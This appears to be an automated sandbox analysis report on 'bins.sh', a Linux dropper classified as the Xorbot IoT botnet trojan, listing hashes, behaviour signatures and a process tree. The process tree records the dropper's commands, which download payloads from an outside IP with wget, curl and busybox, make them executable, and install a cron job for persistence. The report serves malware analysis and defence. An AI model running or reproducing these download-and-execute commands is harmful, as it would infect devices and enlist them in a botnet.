Overview

overview

10

Static

static

1

bins.sh

ubuntu-18.04-amd64

10

bins.sh

debian-9-armhf

10

bins.sh

debian-9-mips

10

bins.sh

debian-9-mipsel

10

Analysis

  • max time kernel
    149s
  • max time network
    147s
  • platform
    ubuntu-18.04_amd64
  • resource
    ubuntu1804-amd64-20240611-en
  • resource tags

    arch:amd64arch:i386image:ubuntu1804-amd64-20240611-enkernel:4.15.0-213-genericlocale:en-usos:ubuntu-18.04-amd64system
  • submitted
    18-02-2025 04:37

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    bins.sh

  • Size

    10KB

  • MD5

    d86eaa590e3754b5c5f7d3d48aafc640

  • SHA1

    c8813488f1208356ead6dd49754edc1174f266a7

  • SHA256

    01762bbc6774c58954d2aef154149f25d195340c877348cbd061e6f3c429d8bd

  • SHA512

    a6833d3c8ca3415c2b90966fcaf03a680be87a3edc4bd88fab1151486c9b92c611705d5560a3284f3bb4cdfeaeae6ba3dab3d945925e45ad9857a4c63c8ec449

  • SSDEEP

    192:3eJJWK7i21QAcr/mRxEpVsP/GsiJzTi21QAEr/mRxYpVsP/l:3eJJWKMpVsP/GsiJz0pVsP/l

Score
10/10
xorbotbotnetdefense_evasiondiscoveryexecutionpersistenceprivilege_escalationtrojan

Malware Config

Signatures

  • Detects Xorbot 1 IoCs
    botnettrojan
  • Xorbot

    Xorbot is a linux botnet and trojan targeting IoT devices.

    botnettrojanxorbot
  • Xorbot family
    xorbot
  • Contacts a large (2180) amount of remote hosts 1 TTPs

    This may indicate a network scan to discover remotely running services.

    discovery
  • Creates a large amount of network flows 1 TTPs

    This may indicate a network scan to discover remotely running services.

    discovery
  • File and Directory Permissions Modification 1 TTPs 1 IoCs

    Adversaries may modify file or directory permissions to evade defenses.

    defense_evasion
  • Executes dropped EXE 1 IoCs
  • Renames itself 1 IoCs
  • Creates/modifies Cron job 1 TTPs 1 IoCs

    Cron allows running tasks on a schedule, and is commonly used for malware persistence.

    executionpersistenceprivilege_escalation
  • Enumerates running processes

    Discovers information about currently running processes on the system

  • Reads runtime system information 64 IoCs

    Reads data from /proc virtual filesystem.

    discovery
  • Writes file to tmp directory 4 IoCs

    Malware often drops required files in the /tmp directory.

Processes

  • /tmp/bins.sh
    /tmp/bins.sh
    1⤵
    • Executes dropped EXE
    • Renames itself
    • Reads runtime system information
    PID:1510
    • /bin/rm
      /bin/rm bins.sh
      2⤵
        PID:1511
      • /usr/bin/wget
        wget http://37.44.238.88/bins/YMDAbTh5ksv2IS1puadKhZMCqyE95GhIqP
        2⤵
        • Writes file to tmp directory
        PID:1512
      • /usr/bin/curl
        curl -O http://37.44.238.88/bins/YMDAbTh5ksv2IS1puadKhZMCqyE95GhIqP
        2⤵
        • Writes file to tmp directory
        PID:1516
      • /bin/busybox
        /bin/busybox wget http://37.44.238.88/bins/YMDAbTh5ksv2IS1puadKhZMCqyE95GhIqP
        2⤵
        • Writes file to tmp directory
        PID:1517
      • /bin/chmod
        chmod 777 YMDAbTh5ksv2IS1puadKhZMCqyE95GhIqP
        2⤵
        • File and Directory Permissions Modification
        PID:1518
      • /usr/bin/crontab
        crontab -l
        2⤵
          PID:1522
        • /usr/bin/crontab
          crontab -
          2⤵
          • Creates/modifies Cron job
          PID:1524
        • /bin/rm
          rm YMDAbTh5ksv2IS1puadKhZMCqyE95GhIqP
          2⤵
            PID:1526
          • /usr/bin/wget
            wget http://37.44.238.88/bins/dON7rUFpfrbJCR3z46HsdnNPXsu1LTNVTi
            2⤵
            • Writes file to tmp directory
            PID:1529

        Network

        MITRE ATT&CK Enterprise v15

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • /tmp/YMDAbTh5ksv2IS1puadKhZMCqyE95GhIqP
          Filesize

          98KB

          MD5

          5141342d0df8699fa32a6b066a0c592e

          SHA1

          8157673225bd5182f16215e2aa823a25ca2d4fbc

          SHA256

          54302d130cd356fb19ea5a763c5ab6b0892fc234118f10ba3196ec4245c83b4d

          SHA512

          d6b24571e7691227abafc70133a1da007c97c2730c820de77a750d2c140a8a75554cc614b4729debc4ec5480124252737c5846a458a5146005285c6d3f9e3801

          Download Submit

        • /tmp/dON7rUFpfrbJCR3z46HsdnNPXsu1LTNVTi
          Filesize

          91KB

          MD5

          7797c982303d052585ffd5c8d9019e45

          SHA1

          97f1f756302271140b77fff520daa4dce951d0aa

          SHA256

          a4fc787c532b2b2a536450c4f0fe5ec62998b2315dfb54f345511f0be30a96a6

          SHA512

          abc4ba50566ec300dc4187d6566aa833d4c5fc47a7bcb8b037f1d9d6731b2e7bbb5bd70c05c60cbdb4a2b115edf44fdcfce258966ebc3b94aff158c975163969

          Download Submit

        • /var/spool/cron/crontabs/tmp.F4fSHF
          Filesize

          210B

          MD5

          56af23b90274de76d68f60a6079a4dc9

          SHA1

          122ee6a25731c3d9a850dd28fb84bc156ed5e044

          SHA256

          41d042537fa353ca75498115548c1522e94a5c1552c7de8bd8aee35b53c955cb

          SHA512

          7c811cef7aa4dc78245777c882aa1099347f7e86cc394d7487152c05a798be8d9dda1a8f4c15a0c686c21d64f431091b42996c855de897f96d06160dcc8574f0

          Download Submit